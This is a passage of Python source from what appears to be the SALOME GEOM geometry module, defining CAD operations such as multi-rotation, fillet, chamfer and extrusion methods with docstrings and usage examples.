# shapes, obtained after each transformation.
#
# @ref tui_multi_rotation "Example"
@ManageTransactions("TrsfOp")
def MultiRotate2DNbTimes(self, theObject, theAxis, theNbTimes1, theRadialStep, theNbTimes2, theName=None):
"""
Rotate the given object around the
given axis on the given angle a given number
times and multi-translate each rotation result.
Translation direction passes through center of gravity
of rotated shape and its projection on the rotation axis.
Parameters:
theObject The object to be rotated.
theAxis Rotation axis. DZ if None.
theNbTimes1 Quantity of rotations to be done.
theRadialStep Translation distance.
theNbTimes2 Quantity of translations to be done.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing compound of all the
shapes, obtained after each transformation.
Example of usage:
rot2d = geompy.MultiRotate2D(prism, vect, 60, 4, 50, 5)
"""
# Example: see GEOM_TestAll.py
theNbTimes1, theRadialStep, theNbTimes2, Parameters = ParseParameters(theNbTimes1, theRadialStep, theNbTimes2)
anObj = self.TrsfOp.MultiRotate2DNbTimes(theObject, theAxis, theNbTimes1, theRadialStep, theNbTimes2)
RaiseIfFailed("MultiRotate2DNbTimes", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "multirotation")
return anObj
## Rotate the given object around the
# given axis on the given angle a given number
# times and multi-translate each rotation result.
# Translation direction passes through center of gravity
# of rotated shape and its projection on the rotation axis.
# @param theObject The object to be rotated.
# @param theAxis Rotation axis. DZ if None.
# @param theAngleStep Rotation angle in radians.
# @param theNbTimes1 Quantity of rotations to be done.
# @param theRadialStep Translation distance.
# @param theNbTimes2 Quantity of translations to be done.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing compound of all the
# shapes, obtained after each transformation.
#
# @ref tui_multi_rotation "Example"
@ManageTransactions("TrsfOp")
def MultiRotate2DByStep (self, theObject, theAxis, theAngleStep, theNbTimes1, theRadialStep, theNbTimes2, theName=None):
"""
Rotate the given object around the
given axis on the given angle a given number
times and multi-translate each rotation result.
Translation direction passes through center of gravity
of rotated shape and its projection on the rotation axis.
Parameters:
theObject The object to be rotated.
theAxis Rotation axis. DZ if None.
theAngleStep Rotation angle in radians.
theNbTimes1 Quantity of rotations to be done.
theRadialStep Translation distance.
theNbTimes2 Quantity of translations to be done.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing compound of all the
shapes, obtained after each transformation.
Example of usage:
rot2d = geompy.MultiRotate2D(prism, vect, math.pi/3, 4, 50, 5)
"""
# Example: see GEOM_TestAll.py
theAngleStep, theNbTimes1, theRadialStep, theNbTimes2, Parameters = ParseParameters(theAngleStep, theNbTimes1, theRadialStep, theNbTimes2)
anObj = self.TrsfOp.MultiRotate2DByStep(theObject, theAxis, theAngleStep, theNbTimes1, theRadialStep, theNbTimes2)
RaiseIfFailed("MultiRotate2DByStep", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "multirotation")
return anObj
## The same, as MultiRotate1DNbTimes(), but axis is given by direction and point
#
# @ref swig_MakeMultiRotation "Example"
def MakeMultiRotation1DNbTimes(self, aShape, aDir, aPoint, aNbTimes, theName=None):
"""
The same, as geompy.MultiRotate1DNbTimes, but axis is given by direction and point
Example of usage:
pz = geompy.MakeVertex(0, 0, 100)
vy = geompy.MakeVectorDXDYDZ(0, 100, 0)
MultiRot1D = geompy.MakeMultiRotation1DNbTimes(prism, vy, pz, 6)
"""
# Example: see GEOM_TestOthers.py
aVec = self.MakeLine(aPoint,aDir)
# note: auto-publishing is done in self.MultiRotate1D()
anObj = self.MultiRotate1DNbTimes(aShape, aVec, aNbTimes, theName)
return anObj
## The same, as MultiRotate1DByStep(), but axis is given by direction and point
#
# @ref swig_MakeMultiRotation "Example"
def MakeMultiRotation1DByStep(self, aShape, aDir, aPoint, anAngle, aNbTimes, theName=None):
"""
The same, as geompy.MultiRotate1D, but axis is given by direction and point
Example of usage:
pz = geompy.MakeVertex(0, 0, 100)
vy = geompy.MakeVectorDXDYDZ(0, 100, 0)
MultiRot1D = geompy.MakeMultiRotation1DByStep(prism, vy, pz, math.pi/3, 6)
"""
# Example: see GEOM_TestOthers.py
aVec = self.MakeLine(aPoint,aDir)
# note: auto-publishing is done in self.MultiRotate1D()
anObj = self.MultiRotate1DByStep(aShape, aVec, anAngle, aNbTimes, theName)
return anObj
## The same, as MultiRotate2DNbTimes(), but axis is given by direction and point
#
# @ref swig_MakeMultiRotation "Example"
def MakeMultiRotation2DNbTimes(self, aShape, aDir, aPoint, nbtimes1, aStep, nbtimes2, theName=None):
"""
The same, as MultiRotate2DNbTimes(), but axis is given by direction and point
Example of usage:
pz = geompy.MakeVertex(0, 0, 100)
vy = geompy.MakeVectorDXDYDZ(0, 100, 0)
MultiRot2D = geompy.MakeMultiRotation2DNbTimes(f12, vy, pz, 6, 30, 3)
"""
# Example: see GEOM_TestOthers.py
aVec = self.MakeLine(aPoint,aDir)
# note: auto-publishing is done in self.MultiRotate2DNbTimes()
anObj = self.MultiRotate2DNbTimes(aShape, aVec, nbtimes1, aStep, nbtimes2, theName)
return anObj
## The same, as MultiRotate2DByStep(), but axis is given by direction and point
#
# @ref swig_MakeMultiRotation "Example"
def MakeMultiRotation2DByStep(self, aShape, aDir, aPoint, anAngle, nbtimes1, aStep, nbtimes2, theName=None):
"""
The same, as MultiRotate2DByStep(), but axis is given by direction and point
Example of usage:
pz = geompy.MakeVertex(0, 0, 100)
vy = geompy.MakeVectorDXDYDZ(0, 100, 0)
MultiRot2D = geompy.MakeMultiRotation2DByStep(f12, vy, pz, math.pi/4, 6, 30, 3)
"""
# Example: see GEOM_TestOthers.py
aVec = self.MakeLine(aPoint,aDir)
# note: auto-publishing is done in self.MultiRotate2D()
anObj = self.MultiRotate2DByStep(aShape, aVec, anAngle, nbtimes1, aStep, nbtimes2, theName)
return anObj
# end of l3_transform
## @}
## @addtogroup l3_transform_d
## @{
## Deprecated method. Use MultiRotate1DNbTimes instead.
def MultiRotate1D(self, theObject, theAxis, theNbTimes, theName=None):
"""
Deprecated method. Use MultiRotate1DNbTimes instead.
"""
print "The method MultiRotate1D is DEPRECATED. Use MultiRotate1DNbTimes instead."
return self.MultiRotate1DNbTimes(theObject, theAxis, theNbTimes, theName)
## The same, as MultiRotate2DByStep(), but theAngle is in degrees.
# This method is DEPRECATED. Use MultiRotate2DByStep() instead.
@ManageTransactions("TrsfOp")
def MultiRotate2D(self, theObject, theAxis, theAngle, theNbTimes1, theStep, theNbTimes2, theName=None):
"""
The same, as MultiRotate2DByStep(), but theAngle is in degrees.
This method is DEPRECATED. Use MultiRotate2DByStep() instead.
Example of usage:
rot2d = geompy.MultiRotate2D(prism, vect, 60, 4, 50, 5)
"""
print "The method MultiRotate2D is DEPRECATED. Use MultiRotate2DByStep instead."
theAngle, theNbTimes1, theStep, theNbTimes2, Parameters = ParseParameters(theAngle, theNbTimes1, theStep, theNbTimes2)
anObj = self.TrsfOp.MultiRotate2D(theObject, theAxis, theAngle, theNbTimes1, theStep, theNbTimes2)
RaiseIfFailed("MultiRotate2D", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "multirotation")
return anObj
## The same, as MultiRotate1D(), but axis is given by direction and point
# This method is DEPRECATED. Use MakeMultiRotation1DNbTimes instead.
def MakeMultiRotation1D(self, aShape, aDir, aPoint, aNbTimes, theName=None):
"""
The same, as geompy.MultiRotate1D, but axis is given by direction and point.
This method is DEPRECATED. Use MakeMultiRotation1DNbTimes instead.
Example of usage:
pz = geompy.MakeVertex(0, 0, 100)
vy = geompy.MakeVectorDXDYDZ(0, 100, 0)
MultiRot1D = geompy.MakeMultiRotation1D(prism, vy, pz, 6)
"""
print "The method MakeMultiRotation1D is DEPRECATED. Use MakeMultiRotation1DNbTimes instead."
aVec = self.MakeLine(aPoint,aDir)
# note: auto-publishing is done in self.MultiRotate1D()
anObj = self.MultiRotate1D(aShape, aVec, aNbTimes, theName)
return anObj
## The same, as MultiRotate2D(), but axis is given by direction and point
# This method is DEPRECATED. Use MakeMultiRotation2DByStep instead.
def MakeMultiRotation2D(self, aShape, aDir, aPoint, anAngle, nbtimes1, aStep, nbtimes2, theName=None):
"""
The same, as MultiRotate2D(), but axis is given by direction and point
This method is DEPRECATED. Use MakeMultiRotation2DByStep instead.
Example of usage:
pz = geompy.MakeVertex(0, 0, 100)
vy = geompy.MakeVectorDXDYDZ(0, 100, 0)
MultiRot2D = geompy.MakeMultiRotation2D(f12, vy, pz, 45, 6, 30, 3)
"""
print "The method MakeMultiRotation2D is DEPRECATED. Use MakeMultiRotation2DByStep instead."
aVec = self.MakeLine(aPoint,aDir)
# note: auto-publishing is done in self.MultiRotate2D()
anObj = self.MultiRotate2D(aShape, aVec, anAngle, nbtimes1, aStep, nbtimes2, theName)
return anObj
# end of l3_transform_d
## @}
## @addtogroup l3_local
## @{
## Perform a fillet on all edges of the given shape.
# @param theShape Shape, to perform fillet on.
# @param theR Fillet radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_fillet "Example 1"
# \n @ref swig_MakeFilletAll "Example 2"
@ManageTransactions("LocalOp")
def MakeFilletAll(self, theShape, theR, theName=None):
"""
Perform a fillet on all edges of the given shape.
Parameters:
theShape Shape, to perform fillet on.
theR Fillet radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the result shape.
Example of usage:
filletall = geompy.MakeFilletAll(prism, 10.)
"""
# Example: see GEOM_TestOthers.py
theR,Parameters = ParseParameters(theR)
anObj = self.LocalOp.MakeFilletAll(theShape, theR)
RaiseIfFailed("MakeFilletAll", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "fillet")
return anObj
## Perform a fillet on the specified edges/faces of the given shape
# @param theShape Shape, to perform fillet on.
# @param theR Fillet radius.
# @param theShapeType Type of shapes in <VAR>theListShapes</VAR> (see ShapeType())
# @param theListShapes Global indices of edges/faces to perform fillet on.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note Global index of sub-shape can be obtained, using method GetSubShapeID().
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_fillet "Example"
@ManageTransactions("LocalOp")
def MakeFillet(self, theShape, theR, theShapeType, theListShapes, theName=None):
"""
Perform a fillet on the specified edges/faces of the given shape
Parameters:
theShape Shape, to perform fillet on.
theR Fillet radius.
theShapeType Type of shapes in theListShapes (see geompy.ShapeTypes)
theListShapes Global indices of edges/faces to perform fillet on.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
Global index of sub-shape can be obtained, using method geompy.GetSubShapeID
Returns:
New GEOM.GEOM_Object, containing the result shape.
Example of usage:
# get the list of IDs (IDList) for the fillet
prism_edges = geompy.SubShapeAllSortedCentres(prism, geompy.ShapeType["EDGE"])
IDlist_e = []
IDlist_e.append(geompy.GetSubShapeID(prism, prism_edges[0]))
IDlist_e.append(geompy.GetSubShapeID(prism, prism_edges[1]))
IDlist_e.append(geompy.GetSubShapeID(prism, prism_edges[2]))
# make a fillet on the specified edges of the given shape
fillet = geompy.MakeFillet(prism, 10., geompy.ShapeType["EDGE"], IDlist_e)
"""
# Example: see GEOM_TestAll.py
theR,Parameters = ParseParameters(theR)
anObj = None
if theShapeType == self.ShapeType["EDGE"]:
anObj = self.LocalOp.MakeFilletEdges(theShape, theR, theListShapes)
RaiseIfFailed("MakeFilletEdges", self.LocalOp)
else:
anObj = self.LocalOp.MakeFilletFaces(theShape, theR, theListShapes)
RaiseIfFailed("MakeFilletFaces", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "fillet")
return anObj
## The same that MakeFillet() but with two Fillet Radius R1 and R2
@ManageTransactions("LocalOp")
def MakeFilletR1R2(self, theShape, theR1, theR2, theShapeType, theListShapes, theName=None):
"""
The same that geompy.MakeFillet but with two Fillet Radius R1 and R2
Example of usage:
# get the list of IDs (IDList) for the fillet
prism_edges = geompy.SubShapeAllSortedCentres(prism, geompy.ShapeType["EDGE"])
IDlist_e = []
IDlist_e.append(geompy.GetSubShapeID(prism, prism_edges[0]))
IDlist_e.append(geompy.GetSubShapeID(prism, prism_edges[1]))
IDlist_e.append(geompy.GetSubShapeID(prism, prism_edges[2]))
# make a fillet on the specified edges of the given shape
fillet = geompy.MakeFillet(prism, 10., 15., geompy.ShapeType["EDGE"], IDlist_e)
"""
theR1,theR2,Parameters = ParseParameters(theR1,theR2)
anObj = None
if theShapeType == self.ShapeType["EDGE"]:
anObj = self.LocalOp.MakeFilletEdgesR1R2(theShape, theR1, theR2, theListShapes)
RaiseIfFailed("MakeFilletEdgesR1R2", self.LocalOp)
else:
anObj = self.LocalOp.MakeFilletFacesR1R2(theShape, theR1, theR2, theListShapes)
RaiseIfFailed("MakeFilletFacesR1R2", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "fillet")
return anObj
## Perform a fillet on the specified edges of the given shape
# @param theShape Wire Shape to perform fillet on.
# @param theR Fillet radius.
# @param theListOfVertexes Global indices of vertexes to perform fillet on.
# \note Global index of sub-shape can be obtained, using method GetSubShapeID()
# \note The list of vertices could be empty,
# in this case fillet will done done at all vertices in wire
# @param doIgnoreSecantVertices If FALSE, fillet radius is always limited
# by the length of the edges, nearest to the fillet vertex.
# But sometimes the next edge is C1 continuous with the one, nearest to
# the fillet point, and such two (or more) edges can be united to allow
# bigger radius. Set this flag to TRUE to allow collinear edges union,
# thus ignoring the secant vertex (vertices).
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_fillet2d "Example"
@ManageTransactions("LocalOp")
def MakeFillet1D(self, theShape, theR, theListOfVertexes, doIgnoreSecantVertices = True, theName=None):
"""
Perform a fillet on the specified edges of the given shape
Parameters:
theShape Wire Shape to perform fillet on.
theR Fillet radius.
theListOfVertexes Global indices of vertexes to perform fillet on.
doIgnoreSecantVertices If FALSE, fillet radius is always limited
by the length of the edges, nearest to the fillet vertex.
But sometimes the next edge is C1 continuous with the one, nearest to
the fillet point, and such two (or more) edges can be united to allow
bigger radius. Set this flag to TRUE to allow collinear edges union,
thus ignoring the secant vertex (vertices).
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
Global index of sub-shape can be obtained, using method geompy.GetSubShapeID
The list of vertices could be empty,in this case fillet will done done at all vertices in wire
Returns:
New GEOM.GEOM_Object, containing the result shape.
Example of usage:
# create wire
Wire_1 = geompy.MakeWire([Edge_12, Edge_7, Edge_11, Edge_6, Edge_1,Edge_4])
# make fillet at given wire vertices with giver radius
Fillet_1D_1 = geompy.MakeFillet1D(Wire_1, 55, [3, 4, 6, 8, 10])
"""
# Example: see GEOM_TestAll.py
theR,doIgnoreSecantVertices,Parameters = ParseParameters(theR,doIgnoreSecantVertices)
anObj = self.LocalOp.MakeFillet1D(theShape, theR, theListOfVertexes, doIgnoreSecantVertices)
RaiseIfFailed("MakeFillet1D", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "fillet")
return anObj
## Perform a fillet at the specified vertices of the given face/shell.
# @param theShape Face or Shell shape to perform fillet on.
# @param theR Fillet radius.
# @param theListOfVertexes Global indices of vertexes to perform fillet on.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note Global index of sub-shape can be obtained, using method GetSubShapeID().
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_fillet2d "Example"
@ManageTransactions("LocalOp")
def MakeFillet2D(self, theShape, theR, theListOfVertexes, theName=None):
"""
Perform a fillet at the specified vertices of the given face/shell.
Parameters:
theShape Face or Shell shape to perform fillet on.
theR Fillet radius.
theListOfVertexes Global indices of vertexes to perform fillet on.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
Global index of sub-shape can be obtained, using method geompy.GetSubShapeID
Returns:
New GEOM.GEOM_Object, containing the result shape.
Example of usage:
face = geompy.MakeFaceHW(100, 100, 1)
fillet2d = geompy.MakeFillet2D(face, 30, [7, 9])
"""
# Example: see GEOM_TestAll.py
theR,Parameters = ParseParameters(theR)
anObj = self.LocalOp.MakeFillet2D(theShape, theR, theListOfVertexes)
RaiseIfFailed("MakeFillet2D", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "fillet")
return anObj
## Perform a symmetric chamfer on all edges of the given shape.
# @param theShape Shape, to perform chamfer on.
# @param theD Chamfer size along each face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_chamfer "Example 1"
# \n @ref swig_MakeChamferAll "Example 2"
@ManageTransactions("LocalOp")
def MakeChamferAll(self, theShape, theD, theName=None):
"""
Perform a symmetric chamfer on all edges of the given shape.
Parameters:
theShape Shape, to perform chamfer on.
theD Chamfer size along each face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the result shape.
Example of usage:
chamfer_all = geompy.MakeChamferAll(prism, 10.)
"""
# Example: see GEOM_TestOthers.py
theD,Parameters = ParseParameters(theD)
anObj = self.LocalOp.MakeChamferAll(theShape, theD)
RaiseIfFailed("MakeChamferAll", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "chamfer")
return anObj
## Perform a chamfer on edges, common to the specified faces,
# with distance D1 on the Face1
# @param theShape Shape, to perform chamfer on.
# @param theD1 Chamfer size along \a theFace1.
# @param theD2 Chamfer size along \a theFace2.
# @param theFace1,theFace2 Global indices of two faces of \a theShape.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note Global index of sub-shape can be obtained, using method GetSubShapeID().
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_chamfer "Example"
@ManageTransactions("LocalOp")
def MakeChamferEdge(self, theShape, theD1, theD2, theFace1, theFace2, theName=None):
"""
Perform a chamfer on edges, common to the specified faces,
with distance D1 on the Face1
Parameters:
theShape Shape, to perform chamfer on.
theD1 Chamfer size along theFace1.
theD2 Chamfer size along theFace2.
theFace1,theFace2 Global indices of two faces of theShape.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
Global index of sub-shape can be obtained, using method geompy.GetSubShapeID
Returns:
New GEOM.GEOM_Object, containing the result shape.
Example of usage:
prism_faces = geompy.SubShapeAllSortedCentres(prism, geompy.ShapeType["FACE"])
f_ind_1 = geompy.GetSubShapeID(prism, prism_faces[0])
f_ind_2 = geompy.GetSubShapeID(prism, prism_faces[1])
chamfer_e = geompy.MakeChamferEdge(prism, 10., 10., f_ind_1, f_ind_2)
"""
# Example: see GEOM_TestAll.py
theD1,theD2,Parameters = ParseParameters(theD1,theD2)
anObj = self.LocalOp.MakeChamferEdge(theShape, theD1, theD2, theFace1, theFace2)
RaiseIfFailed("MakeChamferEdge", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "chamfer")
return anObj
## Perform a chamfer on edges
# @param theShape Shape, to perform chamfer on.
# @param theD Chamfer length
# @param theAngle Angle of chamfer (angle in radians or a name of variable which defines angle in degrees)
# @param theFace1,theFace2 Global indices of two faces of \a theShape.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note Global index of sub-shape can be obtained, using method GetSubShapeID().
#
# @return New GEOM.GEOM_Object, containing the result shape.
@ManageTransactions("LocalOp")
def MakeChamferEdgeAD(self, theShape, theD, theAngle, theFace1, theFace2, theName=None):
"""
Perform a chamfer on edges
Parameters:
theShape Shape, to perform chamfer on.
theD1 Chamfer size along theFace1.
theAngle Angle of chamfer (angle in radians or a name of variable which defines angle in degrees).
theFace1,theFace2 Global indices of two faces of theShape.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
Global index of sub-shape can be obtained, using method geompy.GetSubShapeID
Returns:
New GEOM.GEOM_Object, containing the result shape.
Example of usage:
prism_faces = geompy.SubShapeAllSortedCentres(prism, geompy.ShapeType["FACE"])
f_ind_1 = geompy.GetSubShapeID(prism, prism_faces[0])
f_ind_2 = geompy.GetSubShapeID(prism, prism_faces[1])
ang = 30
chamfer_e = geompy.MakeChamferEdge(prism, 10., ang, f_ind_1, f_ind_2)
"""
flag = False
if isinstance(theAngle,str):
flag = True
theD,theAngle,Parameters = ParseParameters(theD,theAngle)
if flag:
theAngle = theAngle*math.pi/180.0
anObj = self.LocalOp.MakeChamferEdgeAD(theShape, theD, theAngle, theFace1, theFace2)
RaiseIfFailed("MakeChamferEdgeAD", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "chamfer")
return anObj
## Perform a chamfer on all edges of the specified faces,
# with distance D1 on the first specified face (if several for one edge)
# @param theShape Shape, to perform chamfer on.
# @param theD1 Chamfer size along face from \a theFaces. If both faces,
# connected to the edge, are in \a theFaces, \a theD1
# will be get along face, which is nearer to \a theFaces beginning.
# @param theD2 Chamfer size along another of two faces, connected to the edge.
# @param theFaces Sequence of global indices of faces of \a theShape.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note Global index of sub-shape can be obtained, using method GetSubShapeID().
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_chamfer "Example"
@ManageTransactions("LocalOp")
def MakeChamferFaces(self, theShape, theD1, theD2, theFaces, theName=None):
"""
Perform a chamfer on all edges of the specified faces,
with distance D1 on the first specified face (if several for one edge)
Parameters:
theShape Shape, to perform chamfer on.
theD1 Chamfer size along face from theFaces. If both faces,
connected to the edge, are in theFaces, theD1
will be get along face, which is nearer to theFaces beginning.
theD2 Chamfer size along another of two faces, connected to the edge.
theFaces Sequence of global indices of faces of theShape.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note: Global index of sub-shape can be obtained, using method geompy.GetSubShapeID().
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestAll.py
theD1,theD2,Parameters = ParseParameters(theD1,theD2)
anObj = self.LocalOp.MakeChamferFaces(theShape, theD1, theD2, theFaces)
RaiseIfFailed("MakeChamferFaces", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "chamfer")
return anObj
## The Same that MakeChamferFaces() but with params theD is chamfer lenght and
# theAngle is Angle of chamfer (angle in radians or a name of variable which defines angle in degrees)
#
# @ref swig_FilletChamfer "Example"
@ManageTransactions("LocalOp")
def MakeChamferFacesAD(self, theShape, theD, theAngle, theFaces, theName=None):
"""
The Same that geompy.MakeChamferFaces but with params theD is chamfer lenght and
theAngle is Angle of chamfer (angle in radians or a name of variable which defines angle in degrees)
"""
flag = False
if isinstance(theAngle,str):
flag = True
theD,theAngle,Parameters = ParseParameters(theD,theAngle)
if flag:
theAngle = theAngle*math.pi/180.0
anObj = self.LocalOp.MakeChamferFacesAD(theShape, theD, theAngle, theFaces)
RaiseIfFailed("MakeChamferFacesAD", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "chamfer")
return anObj
## Perform a chamfer on edges,
# with distance D1 on the first specified face (if several for one edge)
# @param theShape Shape, to perform chamfer on.
# @param theD1,theD2 Chamfer size
# @param theEdges Sequence of edges of \a theShape.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref swig_FilletChamfer "Example"
@ManageTransactions("LocalOp")
def MakeChamferEdges(self, theShape, theD1, theD2, theEdges, theName=None):
"""
Perform a chamfer on edges,
with distance D1 on the first specified face (if several for one edge)
Parameters:
theShape Shape, to perform chamfer on.
theD1,theD2 Chamfer size
theEdges Sequence of edges of theShape.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
theD1,theD2,Parameters = ParseParameters(theD1,theD2)
anObj = self.LocalOp.MakeChamferEdges(theShape, theD1, theD2, theEdges)
RaiseIfFailed("MakeChamferEdges", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "chamfer")
return anObj
## The Same that MakeChamferEdges() but with params theD is chamfer lenght and
# theAngle is Angle of chamfer (angle in radians or a name of variable which defines angle in degrees)
@ManageTransactions("LocalOp")
def MakeChamferEdgesAD(self, theShape, theD, theAngle, theEdges, theName=None):
"""
The Same that geompy.MakeChamferEdges but with params theD is chamfer lenght and
theAngle is Angle of chamfer (angle in radians or a name of variable which defines angle in degrees)
"""
flag = False
if isinstance(theAngle,str):
flag = True
theD,theAngle,Parameters = ParseParameters(theD,theAngle)
if flag:
theAngle = theAngle*math.pi/180.0
anObj = self.LocalOp.MakeChamferEdgesAD(theShape, theD, theAngle, theEdges)
RaiseIfFailed("MakeChamferEdgesAD", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "chamfer")
return anObj
## @sa MakeChamferEdge(), MakeChamferFaces()
#
# @ref swig_MakeChamfer "Example"
def MakeChamfer(self, aShape, d1, d2, aShapeType, ListShape, theName=None):
"""
See geompy.MakeChamferEdge() and geompy.MakeChamferFaces() functions for more information.
"""
# Example: see GEOM_TestOthers.py
anObj = None
# note: auto-publishing is done in self.MakeChamferEdge() or self.MakeChamferFaces()
if aShapeType == self.ShapeType["EDGE"]:
anObj = self.MakeChamferEdge(aShape,d1,d2,ListShape[0],ListShape[1],theName)
else:
anObj = self.MakeChamferFaces(aShape,d1,d2,ListShape,theName)
return anObj
## Remove material from a solid by extrusion of the base shape on the given distance.
# @param theInit Shape to remove material from. It must be a solid or
# a compound made of a single solid.
# @param theBase Closed edge or wire defining the base shape to be extruded.
# @param theH Prism dimension along the normal to theBase
# @param theAngle Draft angle in degrees.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the initial shape with removed material
#
# @ref tui_creation_prism "Example"
@ManageTransactions("PrimOp")
def MakeExtrudedCut(self, theInit, theBase, theH, theAngle, theName=None):
"""
Add material to a solid by extrusion of the base shape on the given distance.
Parameters:
theInit Shape to remove material from. It must be a solid or a compound made of a single solid.
theBase Closed edge or wire defining the base shape to be extruded.
theH Prism dimension along the normal to theBase
theAngle Draft angle in degrees.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the initial shape with removed material.
"""
# Example: see GEOM_TestAll.py
#theH,Parameters = ParseParameters(theH)
anObj = self.PrimOp.MakeDraftPrism(theInit, theBase, theH, theAngle, False)
RaiseIfFailed("MakeExtrudedBoss", self.PrimOp)
#anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "extrudedCut")
return anObj
## Add material to a solid by extrusion of the base shape on the given distance.
# @param theInit Shape to add material to. It must be a solid or
# a compound made of a single solid.
# @param theBase Closed edge or wire defining the base shape to be extruded.
# @param theH Prism dimension along the normal to theBase
# @param theAngle Draft angle in degrees.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the initial shape with added material
#
# @ref tui_creation_prism "Example"
@ManageTransactions("PrimOp")
def MakeExtrudedBoss(self, theInit, theBase, theH, theAngle, theName=None):
"""
Add material to a solid by extrusion of the base shape on the given distance.
Parameters:
theInit Shape to add material to. It must be a solid or a compound made of a single solid.
theBase Closed edge or wire defining the base shape to be extruded.
theH Prism dimension along the normal to theBase
theAngle Draft angle in degrees.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the initial shape with added material.
"""
# Example: see GEOM_TestAll.py
#theH,Parameters = ParseParameters(theH)
anObj = self.PrimOp.MakeDraftPrism(theInit, theBase, theH, theAngle, True)
RaiseIfFailed("MakeExtrudedBoss", self.PrimOp)
#anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "extrudedBoss")
return anObj
# end of l3_local
## @}
## @addtogroup l3_basic_op
## @{
## Perform an Archimde operation on the given shape with given parameters.
# The object presenting the resulting face is returned.
# @param theShape Shape to be put in water.
# @param theWeight Weight og the shape.
# @param theWaterDensity Density of the water.
# @param theMeshDeflection Deflection of the mesh, using to compute the section.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing a section of \a theShape
# by a plane, corresponding to water level.
#
# @ref tui_archimede "Example"
@ManageTransactions("LocalOp")
def Archimede(self, theShape, theWeight, theWaterDensity, theMeshDeflection, theName=None):
"""
